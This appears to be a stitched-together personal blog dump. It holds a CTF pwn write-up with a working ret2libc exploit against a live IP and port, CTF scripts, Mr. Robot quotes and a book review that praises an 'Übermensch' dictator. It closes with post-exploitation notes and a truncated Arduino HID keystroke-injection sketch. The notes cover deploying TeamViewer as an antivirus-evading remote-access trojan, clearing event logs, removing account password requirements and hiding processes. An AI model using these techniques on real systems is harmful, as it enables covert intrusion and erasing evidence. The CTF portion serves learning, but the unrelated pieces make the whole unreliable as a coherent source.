网鼎杯 round 3: an easy pwn

If even a noob like me could solve it, this pwn really is easy.

Easy as it was, my laptop lagged and my Kali VM blew up, so I didn't get first blood.

First the usual checks: file, ldd, checksec, then a quick look around in IDA.

32-bit program, dynamically linked against libc.so.6, basically no mitigations.

IDA shows the obvious function names; go into vul.

An obvious overflow.

This kind of challenge is formulaic: the binary is dynamically linked, so ret2libc is convenient, and it works just as well with NX enabled, since nothing on the stack ever gets executed.

Then gather the useful information.

From this we know which functions are imported and the address of vul.

Using cyclic, the saved return address sits 76 bytes into the buffer.

We can overflow twice. The first time, return into puts with read's GOT entry as the argument, which prints read's runtime address; subtract read's offset inside libc to get libc's load base. Then add system's offset to that base, overflow a second time, and return into system with the "/bin/sh" string found inside libc as its argument, and that's it. Any libc function will do for the leak, as long as the function you call to do the leaking is one that produces output, so you get the result back. Two things this relies on: the binary is not PIE (vul, puts@plt and the GOT sit at fixed addresses), and the libc32 file shipped with the challenge must match the remote libc, otherwise the offsets are wrong.

Finally, the exploit:

from pwn import *

elf = ELF('./pwn')        # target binary (32-bit, no PIE: fixed PLT/GOT addresses)
libc = ELF('./libc32')    # libc shipped with the challenge; offsets must match the remote one
vul = 0x804850B           # address of the vulnerable function, re-entered for the second overflow
buffer_len = 76           # bytes from the start of the buffer to the saved return address (from cyclic)

context.log_level = 'debug'
p = remote('106.75.95.47', 42264)

# Stage 1: return into puts@plt with read@got as the argument, then return into vul again
payload = b'A' * buffer_len
payload += p32(elf.symbols['puts'])   # puts@plt
payload += p32(vul)                   # puts returns here, so the overflow can be triggered a second time
payload += p32(elf.got['read'])       # argument to puts: the GOT slot holding read's libc address
p.recvuntil(b'what do you want to do?')
p.send(payload)

# One leading byte arrives before the 4-byte address, hence resp[1:5]
resp = p.recvn(5)
log.info("leak: " + resp[1:5].hex())
read_addr = u32(resp[1:5])
log.info("read@libc = %#x" % read_addr)
libc_base = read_addr - libc.symbols['read']
log.info("libc base = %#x" % libc_base)

# Stage 2: return into system("/bin/sh"); the 'AAAA' is system's (unused) return address
payload = b'A' * buffer_len
payload += p32(libc_base + libc.symbols['system'])
payload += b'AAAA'
payload += p32(libc_base + next(libc.search(b'/bin/sh')))
p.recvuntil(b'what do you want to do?')
p.send(payload)
p.interactive()

And the flag is in hand.
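An added worked example, not the challenge's or the author's code, written in plain Python with struct so it needs no pwntools: how cyclic finds the 76-byte offset (the same de Bruijn construction pwntools uses, reimplemented here), how the two stage payloads are laid out, and a check worth running before sending stage 2: libc is mapped on a page boundary, so a computed base that is not 0x1000-aligned means the leak was mis-framed (for instance an off-by-one in the resp[1:5] slice) or the libc32 file does not match the remote libc. The addresses and libc offsets in the demo are constructed, not taken from the challenge binary.

```python
import itertools
import string
import struct


def de_bruijn(alphabet, n):
    """Lazily yield a de Bruijn sequence: every window of n symbols is unique.
    This is the construction behind pwntools' cyclic()."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (lowercase letters, unique 4-byte windows)."""
    return "".join(itertools.islice(de_bruijn(string.ascii_lowercase, n), length)).encode()


def cyclic_find(subseq, n=4, max_len=0x10000):
    """Offset inside the pattern of a crashed EIP value (int or 4 bytes), or -1."""
    if isinstance(subseq, int):
        subseq = struct.pack("<I", subseq)
    return cyclic(max_len, n).find(subseq)


def p32(value):
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    return struct.unpack("<I", data[:4])[0]


def stage1(pad, puts_plt, vul, read_got):
    """Overflow #1: saved EIP -> puts@plt, puts returns into vul, puts' argument is read@got."""
    return b"A" * pad + p32(puts_plt) + p32(vul) + p32(read_got)


def libc_base_from_leak(leaked_read, read_offset):
    """libc base = leaked address - symbol offset; a real mapping is page aligned."""
    base = leaked_read - read_offset
    if base & 0xFFF:
        raise ValueError("libc base %#x is not page aligned: bad leak framing or wrong libc" % base)
    return base


def stage2(pad, base, system_offset, binsh_offset, fake_ret=b"AAAA"):
    """Overflow #2: saved EIP -> system, fake return address, then the "/bin/sh" pointer."""
    return b"A" * pad + p32(base + system_offset) + fake_ret + p32(base + binsh_offset)


if __name__ == "__main__":
    # Constructed crash: EIP ended up holding pattern[76:80]
    crashed_eip = u32(cyclic(200)[76:80])
    pad = cyclic_find(crashed_eip)
    print("offset to saved EIP:", pad)
    # Constructed libc layout (not the challenge's): base 0xf7e12000, read at +0xd5d00,
    # system at +0x3ada0, "/bin/sh" at +0x15ba0b
    leaked = 0xf7e12000 + 0xd5d00
    base = libc_base_from_leak(leaked, 0xd5d00)
    print("libc base: %#x" % base)
    print("stage 2:", stage2(pad, base, 0x3ada0, 0x15ba0b).hex())
```

If cyclic_find returns -1 the crash value was not a pattern window, which usually means the overflow clobbered something other than the saved return address, or the pattern was longer than max_len.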

Fun movie quotes

Is it that we collectively thought Steve Jobs was a great man, even when we knew he made billions off the backs of children? Or maybe it's that it feels like all our heroes are counterfeit. The world itself is a big hoax. Spamming each other with our running commentary of bullshit, masquerading as insight, our social media faking as intimacy. Or is it that we voted for this? Not with our rigged elections, but with our things, our property, our money. I'm not saying anything new. We all know why we do this, not because Hunger Games books make us happy. But because we are sedated. Because it's painful not to pretend. Because we are cowards. Fuck society.

Sometimes I dream of saving the world. Saving everyone from this invisible hand, one that brands us with an employee badge. One that forces us to work for them. One that controls us every day without us knowing it. But I can't stop it. I'm not that special. I'm just anonymous, I'm just alone.

Everyone steals, that's how it works. You think people out there are getting what they deserve? No, they're getting paid over or under, but someone in the chain always gets bamboozled.

Our encryption is the real world.

What I wouldn't give to be normal. To live in that bubble, the reality of the naive. That's how I justify this. To keep their optimism intact. To protect them.

Who are you playing tonight?

Communication is key.

Give a man a gun and he can rob a bank, but give a man a bank, and he can rob the world. It's a bit of a silly expression, actually. A little reductive, but still. I like it, for the same reason most people hate it. Because to me it means that power belongs to people that take it. Nothing to do with their hard work, strong ambitions, or rightful qualifications, no. The actual will to take is often the only thing that's necessary.

The world is a dangerous place, not because of those who do evil, but because of those who look on and do nothing.

But when you get down to it, at its core, beneath every choice, there is either a one or a zero. You either do something or you don't.

People walk around, act like they know what hate means. Nah, no one does, until you hate yourself. I mean, truly hate yourself. That's power.

There it is again, the invisible hand at work, controlling us, even if it pushes us past our threshold of pain. Choices. Maybe Mr. Robot is right. That's what this is all about, the yeses and nos of life. But do we decide them or do they decide us?

That's the power you have, that's the control you own. You don't have to just take what life gives you.

This is the world we live in, people relying on each other's mistakes, to manipulate one another and use one another, even relate to one another. A warm, messy circle of humanity.

She's got her own private maze too, wanting normalcy but stuck in the outer fringes, not knowing how to participate.

He did this to himself. He gave in, he was a coward, he was weak and pathetic, and in the end, that's what killed your father.

You are not sad?
Why should I be? It's a beautiful night, the weather is nice, and I'm enjoying my cigarette.

The bug forces the software to adapt, evolve into something new because of it. Work around it or work through it, no matter what, it changes. It becomes something new, the next version, the inevitable upgrade.

Don't be shy, you can come closer. Unsettling, I know, your betta fish is chatting you up. But time is money.
You need something? Your water, need any changing?
When you live in a fish bowl, ain't no such thing as change. My entire life has been spent in this thing, my whole world is on your table. I look around, same shit, different day, the lighting, the furniture, even the sounds, always the same. I'm on a loop, and it won't stop unless my life does. I'm exhausted with this world.
What can I do, can I help? I think it is pretty obvious. There is really one thing you can do for a brother in a fishbowl.
What is it?
Move him to a goddamn window.

I just told them what they wanted to hear. You're not gonna do it, are you? Change the world. Figures. You were only born a month ago, you're afraid. Afraid of your monster. Do you even know what it is? It doesn't fit.

At some point an "action without user interaction" will come along and sweep my legs. This spinning wheel of false highs and true lows will continue. Daemons, they don't stop working, they are always active, they seduce, they manipulate. They own us.

People always make the best exploits.

Find someone to be your honest self with. Bullshit.

These groups lack the resources and knowledge of the US cell to successfully mount an attack.

We're all living in each other's paranoia, you definitely can't argue that. Is that why people try to avoid each other? I need to calm down, I need to be an observer like you, then I can think more calmly.

I avoid myself, why? I'm afraid, okay. Afraid of what? Finding too much. Too little, nothing at all. Do I even exist?

There was a moment, a point in your recent past, a mistake, a compulsion, decision, something, that led you to this point right now. The best you can do is to find that moment, understand it. It's the only way to reconcile this failure with yourself.

Is any of it real? I mean, look at this! A world built on fantasy! Synthetic emotions in the form of pills, psychological warfare in the form of advertising, mind-altering chemicals in the form of food, brainwashing seminars in the form of media, controlled isolated bubbles in the form of social networks. Real? You want to talk about reality? We haven't lived in anything remotely close to it since the turn of the century. We turned it off, took out the batteries, snacked on a bag of GMOs, while we tossed the remnants in the ever-expanding dumpster of the human condition. We live in branded houses trademarked by corporations, built on bipolar numbers, jumping up and down on digital displays, hypnotizing us into the biggest slumber mankind has ever seen. We live in a kingdom of bullshit.

If you want to change something, perhaps you should try from within.

When you look closely at the seams between order and chaos, do you see the same things I see? The strain, the tears, the glimpses of truth hidden underneath. Why do they fight so desperately to mask what they are? Or is it that they become who they are when they put on the mask?

C'est la mort.

Angela: Who are you? Is this your home? I've been here for hours.
WhiteRose: I wanted to confirm that this wasn't a waste of my time.
Angela: Well, what about my time?
WhiteRose: Oh, honey. My time is much more valuable than yours. Speaking of, I've only allotted 28 minutes for this conversation, which is very generous of me. So we should begin.
Angela: I'd like to leave.
WhiteRose: Oh, no, you wouldn't. You've waited so long. Surely you want to know why. That is, if you indeed believe that your time holds any value. You've been here close to four hours, and you never thought to walk out the door.
Angela: The door was locked.
WhiteRose: I've always found doors fascinating inventions. They hold the entry to unlimited imagination. Before you open any door, a world filled with possibilities sits right behind it. And it isn't until you open it that they are realized. Such potential they bring to our minds. And yet a lock stops you from all of that. How... lazy.

Which one are you playing tonight?

Not as sorry as I am. The truth is, after so many years, you begin to lose more than just your appetite. You wear a mask for so long, you forget who you were beneath it.

Vi Veri Veniversum Vivus Vici

Artists use lies to tell the truth, while politicians use them to cover the truth up.

Sometimes it's the very people who no one imagines anything of who do the things that no one can imagine.

You cannot lose if you do not play.

Control is an illusion.

Is that what God does? He helps? Tell me, why didn't God help my innocent friend, who died for no reason, while the guilty roam free? Okay, fine! Forget the one-offs. How about the countless wars declared in his name? Okay, fine! Let's skip the random, meaningless murder for a second, shall we? How about the racist, sexist, phobia soup we've all been drowning in because of him? And I'm not just talking about Jesus. I'm talking about all organized religion, exclusive groups created to manage control, a dealer getting people hooked on the drug of hope, his followers nothing but addicts who want their hit of bullshit to keep their dopamine of ignorance, addicts afraid to believe the truth, that there is no order, there is no power, that all religions are just metastasizing mind worms meant to divide us so it's easier to rule us by the charlatans that want to run us. All we are to them are paying fanboys of their poorly written sci-fi franchise. Even I'm not crazy enough to believe that distortion of reality.

I'll tell you, the human condition is a straight-up tragedy, cuz.

My mom has no computer for Internet access to tempt me into the night. All that's left for me is just ordinary analog sleep, ending the day's loop. You might not think it's a way to live, but why not? Repeating the same tasks each day without ever having to think about them.

How do I take off a mask when it stops being a mask, when it's as much a part of me as I am? We keep fighting. Like the world we unmasked, we'll find our true selves again. Maybe after wiping away the thick, grimy film of Facebook friend requests and Vine stars, we can all see the light of day. I know we haven't talked in a while. Maybe you only trust me about as much as I trust you right now, but I'm gonna ask you to have hope for me anyway. Just, please, have hope.

Some misc challenges that needed scripts; keeping the scripts for later use

minified

Unzipping gives a PNG: a mess of colored noise with what faintly looks like text. Nothing in the metadata, binwalk finds nothing embedded, changing the height reveals nothing, and none of Stegsolve's preset channel views show anything either. So it is probably hidden in the low bits of the pixels. A bit of PNG background:

PNG supports four channels, RGBA, 8 bits each. Hidden files or data usually go in the low bits of a channel, because a change in the low bits causes no visible difference and the picture still looks the same. But you don't know which channel. With four channels, if the data sits in the low bit of a single channel there are four possibilities; if it is spread over the low bits of two channels, combining them with some operation (add, subtract, multiply, divide, AND, OR, XOR, about seven operators) may produce a new image. Enumerating all of them doesn't take long, so write a Python script and keep it for later. The script below only does XOR; the loop over the other operators isn't written out.

import os

import cv2
import numpy as np


def lowbit(x):
    """Keep only the least significant bit of every channel value."""
    return x & 0x1


png = cv2.imread("flag_enc.png", cv2.IMREAD_UNCHANGED)
if png is None or png.ndim != 3 or png.shape[2] != 4:
    raise SystemExit("expected a 4-channel (BGRA) PNG")

# OpenCV orders the channels B, G, R, A: index 0 is blue, 3 is alpha
os.makedirs("temp", exist_ok=True)  # os.system("cd temp") only changes directory in a child shell, so it did nothing

# XOR the low bit-plane of every pair of channels; a channel with itself gives an all-black image
for i in range(4):
    for f in range(4):
        dst = cv2.bitwise_xor(lowbit(png[:, :, i]), lowbit(png[:, :, f]))
        cv2.imwrite("temp/%d_%d.png" % (i, f), dst * 255)  # scale 0/1 to 0/255 so the plane is visible
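As an added example (pure Python, no OpenCV, not the original script): the full enumeration the text describes, run over a constructed 8x4 BGRA image in which the bytes of the text "hi" are hidden in the least significant bit of the blue channel. It extracts every single-channel bit plane, combines every channel pair with each distinct operator, and turns a plane back into bytes so hidden text can be read off directly. One point the enumeration relies on: on single bits, add and subtract mod 2 are the same as XOR and multiply is the same as AND, so AND, OR and XOR are the only pairwise combinations that yield distinct planes.

```python
from itertools import combinations

CHANNELS = ("B", "G", "R", "A")  # OpenCV channel order for an RGBA PNG

# Distinct ways to combine two bit planes. On single bits (x + y) % 2 and (x - y) % 2
# equal XOR and x * y equals AND, so the "seven operators" collapse to these three.
OPS = {
    "and": lambda x, y: x & y,
    "or": lambda x, y: x | y,
    "xor": lambda x, y: x ^ y,
}


def bit_plane(pixels, channel, bit=0):
    """pixels: rows of [b, g, r, a] values -> rows of 0/1 for one bit of one channel."""
    return [[(px[channel] >> bit) & 1 for px in row] for row in pixels]


def combine(plane_a, plane_b, op):
    f = OPS[op]
    return [[f(x, y) for x, y in zip(ra, rb)] for ra, rb in zip(plane_a, plane_b)]


def enumerate_planes(pixels, bits=(0,)):
    """Every single-channel plane plus every channel pair under every operator,
    keyed like 'B0' or 'B0_xor_G0', for each requested bit position."""
    planes = {}
    for bit in bits:
        singles = [(c, bit_plane(pixels, i, bit)) for i, c in enumerate(CHANNELS)]
        for c, plane in singles:
            planes["%s%d" % (c, bit)] = plane
        for (ca, pa), (cb, pb) in combinations(singles, 2):
            for op in OPS:
                planes["%s%d_%s_%s%d" % (ca, bit, op, cb, bit)] = combine(pa, pb, op)
    return planes


def plane_to_bytes(plane):
    """Read a plane row-major as a bit stream, MSB first, 8 bits per byte."""
    bits = [b for row in plane for b in row]
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        out.append(int("".join(map(str, bits[i:i + 8])), 2))
    return bytes(out)


def embed_lsb(pixels, channel, payload):
    """Hide `payload` in the LSB of one channel, row-major (used only to build the sample)."""
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    flat = [px for row in pixels for px in row]
    if len(bits) > len(flat):
        raise ValueError("payload does not fit in the image")
    for px, bit in zip(flat, bits):
        px[channel] = (px[channel] & ~1) | bit
    return pixels


def sample_image(width=8, height=4):
    """Constructed noisy BGRA image (not a real challenge file) carrying b'hi' in B's LSB."""
    pixels = [[[(x * 37 + y * 91 + c * 53) & 0xFF for c in range(4)]
               for x in range(width)] for y in range(height)]
    return embed_lsb(pixels, CHANNELS.index("B"), b"hi")


def recover_text(pixels, key="B0"):
    """Bytes read from one enumerated plane; the right key is found by trying them all."""
    return plane_to_bytes(enumerate_planes(pixels)[key])


if __name__ == "__main__":
    img = sample_image()
    for key, plane in sorted(enumerate_planes(img).items()):
        print(key, plane_to_bytes(plane))
    print("hidden text:", recover_text(img))
```

On a real file the planes would be written out as images and eyeballed, as the cv2 script does; feeding each plane through plane_to_bytes and checking for printable ASCII or a known file header is the quick automated filter.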


I forget which challenge this was, but it ended with a pile of coordinates. Coordinates, or coordinates plus RGB values, almost always mean an image. The largest coordinate was under 300, so create a canvas with OpenCV and write the points in. The script was optimized a bit: the first version looped over the whole 300x300 canvas and checked whether each coordinate was in the txt file, and that lookup made it slow. Here the canvas is created with zeros (black), so just loop over the coordinate list, change those pixels, and invert at the end. It runs fast, no waiting.

import cv2
import numpy as np

canvas = np.zeros((300, 300, 3), dtype="uint8")  # black canvas; every coordinate in the file is below 300

# One "x,y" pair per line
points = []
with open("123.txt") as f:
    for line in f:
        line = line.strip()
        if line:
            points.append(line.split(","))

# Loop over the points rather than the canvas: far fewer iterations than 300*300 lookups
for p in points:
    canvas[int(p[0]), int(p[1])] = [255, 255, 255]  # numpy indexes as [row, column]
canvas = cv2.bitwise_not(canvas)  # invert so the points are dark on a white background

cv2.imwrite("2.jpg", canvas)
cv2.imshow("Canvas", canvas)
cv2.waitKey(0)

And that's it.


One-line Caesar

# a holds the ciphertext; prints all 52 shifts of every code point (no alphabet wrap-around)
print("".join("".join(chr(ord(i) - n) for i in a) + "\n" for n in range(-26, 26)))
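An added example (not the original one-liner) of a Caesar shift that wraps within the alphabet and leaves case, digits and punctuation alone, with the 26-way brute force returned as data and ranked by common-letter frequency so the candidates can be filtered instead of eyeballed. The one-liner above shifts every code point, so spaces and punctuation turn into garbage at every shift but the right one; this version keeps them readable at all shifts. The sample ciphertext is constructed (ROT3 of a pangram).

```python
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def caesar(text, shift):
    """Shift letters by `shift` positions with wrap-around; non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def brute_force(ciphertext):
    """All 26 candidate plaintexts, keyed by the shift that was undone to produce them."""
    return {shift: caesar(ciphertext, -shift) for shift in range(26)}


def letter_score(text, common="etaoinshr"):
    """Crude English-likeness: how many of the commonest English letters the text contains."""
    lowered = text.lower()
    return sum(lowered.count(c) for c in common)


def rank(ciphertext):
    """Candidates ordered best-first by letter_score; the top entry is the likely plaintext."""
    return sorted(brute_force(ciphertext).items(), key=lambda kv: letter_score(kv[1]), reverse=True)


if __name__ == "__main__":
    ct = "Wkh txlfn eurzq ira mxpsv ryhu wkh odcb grj."  # constructed: ROT3 of a pangram
    for shift, pt in rank(ct)[:3]:
        print(shift, pt)
```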

The long hard road out of hell, a book review (to be continued)

Look at the title, "the long hard road out of hell". Combined with his main ideas it is not hard to understand: this is his account of going from a naive, silly kid to an "Antichrist", and he feels extremely lucky about it; without the things that helped "me" grow, "I" might still be a devout Christian. Many people online translate it as "the long road leaving hell"; that can't be right. It should be the road to hell, not an escape from it.
Right at the start the autobiography quotes a passage from Nietzsche, namely the appearance of an "Antichrist Superstar" who is misread by others as childish, who never settles or rests, who despises everything and re-evaluates all values. That would actually be quite good: if a personally worshipped "Antichrist Superstar dictator" appeared and took power, to forcibly raise the quality of the population and "constrain" everyone into a thinking person of strong will, the world would be at peace. Unlikely as that is, it doesn't stop me from affirming Nietzsche (except, of course, for his attitude toward women).

The opening line is dedicated to his parents: may God forgive them, for bringing the sin that is "me" into the world. However you hear it, this sounds like hot air, but that's unavoidable; Manson is a poser, and I often say things like that too, for instance "let me try eating with chopsticks like a person, let me try sitting on a stool to eat like a person", remarks that look self-mocking but are really jabs at how hackneyed and stale people are.

Part one: "When I Was a Worm"
Chapter one: The Man That You Fear
"The man that you fear" should be someone like his grandfather, and "you" should mean "most people". Even if my reading is wrong, I'd rather read it this way. It's like when people read an ancient poem: they insist on researching the background, insist on gossiping out the author's real intent, and what they guess in the end isn't necessarily a hundred percent right. You have to admit it is only your reading, or modestly call it your "misreading"; that fits your own situation, can be borrowed from, and still respects the poet. Your reading is only a tampered copy.
Most of chapter one of part one describes how he and his cousin, driven by curiosity, explored his grandfather's "filthy" basement; later other things about his grandfather surfaced: the grandfather secretly wore women's underwear, the basement was full of sex toys, the grandfather was a total pervert. Yet in a later interview he revealed that his grandfather was a misunderstood man (the idiot host kept insisting Manson had a childhood trauma because of his grandfather, really stupid; he told her countless times that Manson now identifies with his grandfather and she acted as if she hadn't heard). Of course we should respect and tolerate, but every time I hear people say the word "tolerate" I get annoyed. It's like when Taiwan had just declared same-sex marriage legal and people complained that it was a special law rather than a universal, all-inclusive, loophole-free wording: if you write "same-sex marriage is legal" into the statute like an idiot, then the transgender, the agender, the heterosexual and so on will be unhappy. So it isn't tolerance; this is simply natural. Every time I think of this I get angry. To put it crudely, "I didn't fuck your mother, so even if I tear down the Forbidden City it's none of your business". The word tolerance itself denies the correctness of whatever is being tolerated. So, we should respect: if you don't like it you don't have to look, and I didn't fuck your mother (I haven't violated any of your rights).

Chapter two: For Those About to Rock, We Will Stop You
"There is strong evidence that, while Ms. Price was elaborating in seminar on the world's impending final judgment, I discovered something sexy about her. Watching her stand at the lectern like a Siamese cat, with her pouting lips, her meticulously combed hair, her silk blouse, a body hiding a need to be fucked, and a walk that invited someone to fuck her in the ass, I could say there was something alive there, waiting to roar: the roar of repressed desire when it bursts through the Christian surface. I resented her for filling my entire adolescence with nightmares, but I felt that resentment came more from the sexual fantasies and wet dreams I borrowed her for."

"Then she fetched a paddle from the corner of the room, a thing with a distinctly sadomasochistic flair designed by a friend from woodshop class, with holes that cut the air resistance as much as possible. I took three quick, accurate, hard Christian blows."

These two passages are excellent; Manson reads like a popular-edition Lu Xun.

Day after day went by, the world looked peaceful, with no trace of the so-called end of the world, and the naive young Manson felt cheated. He didn't like his school, he wanted to go somewhere else, and so he set out on the road to hell, the road of rebellion. Of course, when he says he woke up and felt he had been cheated by the lie of apocalyptic salvation, and even felt guilty for a while, afraid he would not be saved, he isn't really talking only about the end-of-the-world lie; that is just one way of putting it. The lie about the end of the world is far too flimsy, and the lie of this god called God is far too flimsy. What he means is the general case: every distorted value system forced onto people, every fabrication that serves politics.

Reading this reminded me of a passage from Mr. Robot:
Is that what God does? He helps? Tell me, why didn't God help my innocent friend, who died for no reason, while the guilty roam free? Okay, fine! Forget the one-offs. How about the countless wars declared in his name? Okay, fine! Let's skip the random, meaningless murder for a second, shall we? How about the racist, sexist, phobia soup we've all been drowning in because of him? And I'm not just talking about Jesus. I'm talking about all organized religion, exclusive groups created to manage control, a dealer getting people hooked on the drug of hope, his followers nothing but addicts who want their hit of bullshit to keep their dopamine of ignorance, addicts afraid to believe the truth, that there is no order, there is no power, that all religions are just metastasizing mind worms meant to divide us so it's easier to rule us by the charlatans that want to run us. All we are to them are paying fanboys of their poorly written sci-fi franchise. Even I'm not crazy enough to believe that distortion of reality.
Below is my own translation:
Is this what God does? Does he help us? Then tell me, why didn't he help my friend who died innocent, while letting the real criminals go free? Okay, set aside those individual cases. What about the countless wars launched in his name? Okay, set aside these random, meaningless murders. Let's talk about the racism, the sexism, the fear-mongering we are mired in. And I'm not only talking about Jesus; I'm talking about every religious organization, every exclusive group, created to control the behaviour of the masses. A dealer selling the drug of an illusory, empty hope, his followers nothing but addicts, wanting a hit of the drug of hope to keep up the dopamine of their ignorance, addicts who dare not face reality: there is no order at all, no divine power, and all these exclusive groups are nothing but plague-spreading scum who will stop at nothing to divide us so they can control us better, a bunch of bastards who want to lord it over us. To them we are nothing but paying fans of the crippled science fiction they wrote. Even I'm not crazy enough to believe that distortion of reality.

A greedy lecher, a glutton, an insatiable man: his "rebellion" and "crimes" are in fact the acts of the Übermensch; as for the inferior, they are to be helped and reformed, or else dealt with.

Chapter three
A Half-Baked Youth
The whole chapter is just about his horny adventures: who he fantasized about, who he slept with, and that he had done drugs.

Chapter four
The Road to Hell Is Paved with Flowery Rejection Letters
I was somewhat lonely, and I soon developed disagreeable mannerisms which made me unpopular throughout my schooldays. I had the lonely child's habit of making up stories and holding conversations with imaginary persons, and I think from the very start my literary ambitions were mixed up with the feeling of being isolated and undervalued. I knew that I had a facility with words and a power of facing unpleasant facts, and I felt that this created a sort of private world in which I could get my own back for my failure in everyday life. (George Orwell, Why I Write)
It opens with this quote, probably to praise himself: you can create a world of your own inside this cold, random world. The Übermensch must have this ability; you must be able to fantasize, and not see it as an illness. It is the only power that lets you hold to your own values without your spirit collapsing. Adversity cannot defeat someone without standards; someone without standards is born thick-skinned, not ordinarily thick-skinned but thick-skinned in another sense, not the sense you and I mean. The thin-skinned scream out loud and then settle for a quiet life.

The rest is a short story Manson wrote when he was young and submitted somewhere; I found it uninteresting, because my only complaint about Manson is his self-harm. How can a person of strong will self-harm? Of course his self-harm is none of my business; I don't self-harm, and if you do I won't discriminate against you.

Chapter five
I Wasn't Born with Enough Middle Fingers
Actually, the world belongs to women; all happy families are made of lesbians; women are a species superior to men; the basis for classifying men and women isn't genitals or the like, and no pure man or pure woman exists.
Women should all be sadists, and men should be enslaved.

Several chapters don't suit my taste, so why am I still going through his book to talk about my own outlook on life and values? Because I'm inarticulate.
For instance his frivolous attitude toward women: in some respects it isn't frivolous, but overall, objectively, it is, and he isn't woman enough himself.

Chapter six
Spooky Kids
Marilyn Manson is the perfect protagonist's name for a frustrated writer like me. He is a character who, because he despises the world around him, and even more so himself, does everything he can to con people into liking him. Then, once he has won their confidence, he uses it to destroy them.
It reminds me of Hitler and Nietzsche, and of a line from Colby in Mr. Robot: If you want to change something, perhaps you should try from within.
Orators; that is the methodology of successful revolutions. But "under actual conditions", if you want to influence something, you first have to become an Übermensch not only in thought but also equipped with some necessary skills, such as "deception".
If everyone doesn't care, then it truly doesn't matter; many things are caused by not caring. Your not caring isn't just your taste, it is that you are an inferior person. And much of the caring is also caused by inferior people. As I said before, some things aren't merely a matter of taste and don't vary from person to person, and only the Übermensch can tell the questions of "taste" that vary from person to person apart from those that don't. Control is an illusion, but the Übermensch isn't made by people.

This chapter also has some sloppy parts. I have always believed there are no mentally ill people in this world; apart from those physiologically not capable, all the so-called mentally abnormal are normal people. So a lunatic who kills innocent people must die, deserves to die; why keep him fed in prison? A waste of food. Of course I don't know how some people think, so someone may or may not see themselves in this extreme view.

Here he suddenly quotes someone, I don't know who,
and mentions Mechanical Man.
"The lyrics of Mechanical Man are, on the surface, very childish rhymes, but they still hold metaphors for AIDS, humanity's long-standing habit of self-destruction out of ignorance, science, religion, sex and drugs."
Not much is said here, so I want to borrow it to fit our situation below; I'm hedging here by saying "our", you know what I mean. Manson later had a song, Mechanical Animals, and given his circumstances it is surely the same old satire of people under the scam of Jesus Christ, who are like mechanical animals: they only obey others, not themselves, whatever others say goes, that is, people have no self-awareness; control is an illusion. Your taste is shaped by the outside world, your preferences depend on the environment you are in, and your stupidity can't escape your education. Only the Übermensch is capable of escaping outside influence. Don't argue with me like a moron: escaping outside influence doesn't mean being unaffected by the outside; it means switching on promiscuous mode and then choosing for yourself, and what you choose doesn't become a lifelong rule, it keeps updating, never settling, so the choice isn't someone else's choice but your own. Inferior people don't even switch on promiscuous mode.

Extracting a resource file from a VB program

' Write the custom resource ResID/ResName (compiled into the EXE from the .res file) out to UnResPath
Private Function UnRes(ByVal ResID As Integer, ByVal ResName As String, ByVal UnResPath As String)
    Dim Temp() As Byte
    Dim fh As Integer
    Temp = LoadResData(ResID, ResName)   ' raw bytes of the resource
    fh = FreeFile                        ' next free file handle instead of hard-coding #1
    Open UnResPath For Binary As #fh
    Put #fh, , Temp()
    Close #fh
End Function

First generate the .res file with a resource editor.

TeamViewer as a remote-access trojan

First of all, TeamViewer obviously won't be flagged by antivirus.

During a pentest you run into a box where you only have a shell: 3389 isn't open, privilege escalation goes nowhere, or it's on an internal network where port forwarding is also a pain. You want to upload a RAT for convenience, but 360 or some other AV is sitting there. So upload TeamViewer instead. The catch: it has no command-line interface.

So what to do?

The TeamViewer directory has a rolloutfile.tv13 file that stores the client ID. As for the password: setting a fixed password is obviously more convenient. Searching memory with CE turned up no password, and there is no config file in the directory, so I searched the registry and found the following.

The password is stored encrypted there too, and looks complicated, so never mind: just export the .reg and import it into the registry on the target later.

Get a shell, upload the zip, upload busybox.exe (the Windows build of busybox), upload the .reg, then busybox unzip.

start teamviewer.exe, busybox cat rolloutfile.tv13, regedit /s **.reg

You'll say TeamViewer triggers UAC; msf has bypassuac modules for that.

Some practical commands and dirty tricks for post-exploitation (to be continued)

First, wmic
wmic cpu list brief/full
wmic memphysical list brief/full
These two aren't for privilege escalation, but you know, look at the detailed spec to decide whether the box is worth escalating on.

wmic process get commandline,caption,executablepath
These three process fields get used constantly: caption is the process name, commandline shows the arguments it was started with, and executablepath shows the file behind it. Especially useful when tasklist has been disabled:
use this wmic process command instead, and if that fails too, upload the Windows build of busybox and run busybox ps.

Create a process, kill a process
wmic process call create "taskmgr.exe"
wmic process where name="explorer.exe" call terminate

See what is installed
wmic product get name
List running services
wmic service where (state="running") get caption, name, startmode
List startup items
wmic startup get Caption, Command

Use this to check whether the box is a virtual machine
wmic onboarddevice get Description,DeviceType,Enabled,Status /format:list

Lock (disable) an account; set disabled=false to re-enable it
wmic useraccount where name='demo' set disabled=true

Drop the password requirement
wmic useraccount where name='demo' set PasswordRequired=false

Rename a user
wmic useraccount where name='demo' rename hacker

Find the antivirus install path
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe

Clear the system event log
wmic nteventlog where filename='system' cleareventlog

Sometimes you hit 360 or another AV, and a glance at tasklist shows the AV running under administrator. Use query user to find that session's id, then logoff that id ;) and it's gone.

Hide a program with VBS
Set wShell = CreateObject("WScript.Shell")
wShell.Run "", 0    ' first argument: the command to launch; 0 = hidden window

HID attack with an Arduino Leonardo

#include <Keyboard.h>

// Runs once when the Leonardo is plugged in: it enumerates as a USB keyboard and types the commands below
void setup() {
  Keyboard.begin();
  delay(1000);                        // give the host time to enumerate the keyboard
  Keyboard.press(KEY_CAPS_LOCK);      // turn Caps Lock on; the inverted-case WebClient lines below arrive in normal case
  delay(200);
  Keyboard.release(KEY_CAPS_LOCK);
